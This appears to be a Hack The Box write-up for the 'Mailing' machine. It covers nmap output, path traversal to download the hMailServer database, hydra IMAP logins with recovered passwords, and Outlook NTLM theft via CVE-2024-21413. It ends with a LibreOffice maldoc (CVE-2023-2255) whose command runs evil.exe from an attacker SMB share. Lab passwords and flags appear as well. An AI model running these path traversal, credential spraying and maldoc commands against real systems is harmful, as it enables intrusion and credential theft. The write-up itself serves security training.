Nmap Results
# Nmap 7.94SVN scan initiated Tue May 7 00:00:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.180.156
Nmap scan report for 10.129.180.156
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: IMAP4rev1 SORT completed IMAP4 OK NAMESPACE RIGHTS=texkA0001 ACL CHILDREN CAPABILITY IDLE QUOTA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
65522/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-07T04:04:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 00:05:05 2024 -- 1 IP address (1 host up) scanned in 267.31 seconds
We can see references to mailing.htb
in the multiple protocol headers in the nmap
scan, so let's go ahead and get that added to our /etc/hosts
file.
echo '10.129.180.156 mailing.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/139,445
smbclient -N -L //10.129.180.156
TCP/80
Testing for Path Traversal and File Inclusion
Find the Configuration File for the Mail Server
Downloading the hMailServer Database
curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf' -o hMailServer.sdf
git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
cd hMailDatabasePasswordDecrypter
make
Reading the Database File
.sdf
file to a Windows box and installing a tool on Windows to open the .sdf
file. I am going to be using wine
on my Kali box to open the file. It was a pain trying to find a binary that will work with wine
due to various .NET
requirements.For the purpose of reading the .sdf
file, I'll be using this application: https://www.flyhoward.com/SDF_Viewer.aspx. It is a Windows binary, which is why we're using wine
.
Interesting Info from the Database
git clone https://github.com/mvdnes/hm_decrypt
cd hm_decrypt
# Found that xbuild will compile a CSharp .sln
# Via search with Bing Co-Pilot
xbuild
# xbuild output will show that the binaries are in bin/Debug
cd bin/Debug
Reading the Server Logs
Using a combination of data found on Google and ChatGPT / Bing Co-Pilot, my understanding is that logs should be in C:\Program Files (x86)\hMailServer/Logs/hMailServer_{format}.log
, where we substitute {format}
for whichever logging type is being recorded.
I tried variations of smtp
, pop3
, and imap
, but couldn't find anything. I did — however — find that awstats.log
is enabled.
curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log' | awk -v FS=' ' '{print $3,$4}' | tr ' ', '\n' | sort -u
TCP/143
Testing IMAP Logins
hydra -I -f -V -L emails.txt -p 'homenetworkingadministrator' -c 1 imap://mailing.htb
hydra -I -f -V -L emails.txt -p 'Bm8zF3c5s7R9L1o2' -c 1 imap://mailing.htb
Mapping Mailboxes with Mutt
Administrator
nano admin-muttrc
set my_mailproto="imap"
set my_mailuser="administrator@mailing.htb"
set my_mailpass="homenetworkingadministrator"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F ./admin-muttrc
Inbox
folder. To change to another folder, press the c
key and then the ?
to select a folder. Press q
to quit out of mutt
.Maya
nano maya-muttrc
set my_mailproto="imap"
set my_mailuser="maya@mailing.htb"
set my_mailpass="Bm8zF3c5s7R9L1o2"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F maya-muttrc
Exploit
CVE-2024-21413
This really cuts to the point of this box being named Mailing, in that we're looking at sending a crafted email to a user. This crafted email — when viewed using the email client's HTML view — leads to a zero-click NTLM credential theft, as the file:///
link is parsed without any security restraints. When the file:///
link is followed, this will lead to a SMB connection to the attacker's system, using NTLM as the authentication mechanism.
maya@mailing.htb
an email in the instructions.pdf
file as a foreshadowing of the initial foothold.Test WinRM Access
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Access denied to systeminfo
Current User
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
Users and Groups
Local Users
Name Enabled Description
---- ------- -----------
Administrador False Cuenta integrada para la administración del equipo o dominio
DefaultAccount False Cuenta de usuario administrada por el sistema.
Invitado False Cuenta integrada para el acceso como invitado al equipo o dominio
localadmin True
maya True
WDAGUtilityAccount False Una cuenta de usuario que el sistema administra y usa para escenarios de Protección de aplicaciones de Windows Defender.
Local Groups
Name
----
Administradores
Administradores de Hyper-V
Duplicadores
IIS_IUSRS
Invitados
Lectores del registro de eventos
Operadores criptográficos
Operadores de asistencia de control de acceso
Operadores de configuración de red
Operadores de copia de seguridad
Propietarios del dispositivo
Remote Management Users
System Managed Accounts Group
Usuarios
Usuarios avanzados
Usuarios COM distribuidos
Usuarios de escritorio remoto
Usuarios del monitor de sistema
Usuarios del registro de rendimiento
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f897:ed7d:f35e:32a8
Temporary IPv6 Address. . . . . . : dead:beef::d8e9:b8a4:3d01:3f62
Link-local IPv6 Address . . . . . : fe80::c1bf:9c37:4c49:944f%14
IPv4 Address. . . . . . . . . . . : 10.129.25.72
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%14
10.129.0.1
Scheduled Tasks
Interesting Scheduled Tasks
Run As User: maya
TaskName: \Test
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1
Run As User: localadmin
TaskName: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Task To Run: COM handler
Interesting Files
C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/Public/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title"
oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop
oor:name="Thumbnail" oor:op="fuse"><value>iVBORw0KGgoAAAANSUhEUgAAAYwAAAIACAIAAAAewcwjAAAGnklEQVR4nO3UoQEAIAzAMMT+f3l8gKUiuaCqs7sHoGp+BwC8mBSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJ
AmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFp
JgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZF
JBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJ
pJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSY
FpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQ
ZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaS
QFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBa
SZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZ
SQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQNoFyY0K/qoBL3wAAAAASUVORK5CYII=</value></prop></node></item>
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/maya/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title"
oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop
oor:name="Thumbnail" oor:op="fuse"><value>iVBORw0KGgoAAAANSUhEUgAAAYwAAAIACAIAAAAewcwjAAAGnklEQVR4nO3UoQEAIAzAMMT+f3l8gKUiuaCqs7sHoGp+BwC8mBSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJ
AmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFp
JgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZF
JBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJ
pJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSY
FpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQ
ZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaS
QFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBa
SZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZ
SQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQNoFyY0K/qoBL3wAAAAASUVORK5CYII=</value></prop></node></item>
Privilege Escalation
Lateral to localadmin
During the post-exploitation enumeration, a few things stick out to me at first glance:
C:\Important Documents
- The scheduled task running
soffice.ps1
out ofC:\Users\localadmin
I was also hunting around in different directories searching for keywords such as password
, passw
, pass
, etc. This is how I landed on the document at C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu
which is pointing me towards the possibility of privilege escalation via malicious document.
Exploring the Maldoc Avenue
Obviously, we can't read the files in C:\Users\localadmin
, so we can't be sure what the soffice.ps1
script is doing, but let's see if we can find any other information that might help.
# Recursively list the entire C:\ volume for files
# Filter on file names containing *soffice*
# Show only full paths
(Get-ChildItem 'C:\' -File -Recurse -Filter '*soffice*' -ErrorAction SilentlyContinue).FullName
C:\Program Files\LibreOffice\program\soffice.ps1
# Set the directory where the .odt files are located
$directory = "C:\Users\Public\Documents"
# Get all files with .odt extension in the specified directory
$files = Get-ChildItem -Path $directory -Filter *.odt
# Loop through each .odt file and open it
foreach ($file in $files) {
Start-Process $file.FullName
}
Looking at the source code for C:\Program Files\LibreOffice\program\soffice.ps1
, we can see that it will attempt to open any *.odt
file in a specified directory; in this case, C:\Users\Public\Documents
.
I suspect the C:\Users\localadmin\Documents\soffice.ps1
script is a modified version of the one discovered here. It probably reads from a different directory — I'm thinking the C:\Important Documents
directory.
This information — coupled with what I found earlier showing references to file:///C:/Users/maya/Documents/exploit.odt
makes me think that my hypothesis to pivot using a maldoc is correct.
Crafting the Maldoc
This was one of the lateral pivots in the HTB Office box as well, so I'll just be using my existing knowledge of the exploit from working on this box. The POC and CVE data are linked just below for more information. But in short, the exploit works due to the fact that in certain versions, LibreOffice will load links in crafted documents without user interaction (zero-click).
# Clone the repo
git clone https://github.com/elweth-sec/CVE-2023-2255
# Enter the directory
cd CVE-2023-2255
# Create the malicious .odt document
python3 CVE-2023-2255.py --cmd '//10.10.14.112/evil/evil.exe' --output pwn.odt
# Start a SMB server to catch the hash
sudo impacket-smbserver -smb2support evil .
rockyou.txt
and we probably won't be able to relay the NetNTLMv2 hash back onto the target itself. So, let's create one more maldoc and finish the job.Flags
User
9784c83d0dbf02a9f237197737876625
Root
3d664924b00f0be0e92f04db10ff3e76